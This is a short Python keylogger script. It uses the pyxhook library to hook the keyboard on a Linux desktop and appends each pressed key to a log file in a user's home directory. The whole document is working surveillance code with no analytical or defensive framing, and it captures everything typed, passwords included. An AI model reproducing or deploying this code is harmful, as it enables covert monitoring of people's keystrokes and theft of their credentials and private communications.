#!/usr/bin/python3

import os
import pyxhook

log_file = '/home/jamie/get_keylogged_son'


def OnKeyPress(event):
    with open(log_file, 'a') as f:
        f.write('{}\n'.format(event.Key))


def CreateFileIfDoesntExist(filename):
    file = open(filename, 'w')
    file.close()


CreateFileIfDoesntExist(log_file)

new_hook = pyxhook.HookManager()
new_hook.KeyDown = OnKeyPress
new_hook.HookKeyboard()
try:
    new_hook.start()
except KeyboardInterrupt:
    pass
except Exception as ex:
    msg = 'Error while catching events:\n  {}'.format(ex)
    pyxhook.print_err(msg)
    with open(log_file, 'a') as f:
        f.write('\n{}'.format(msg))
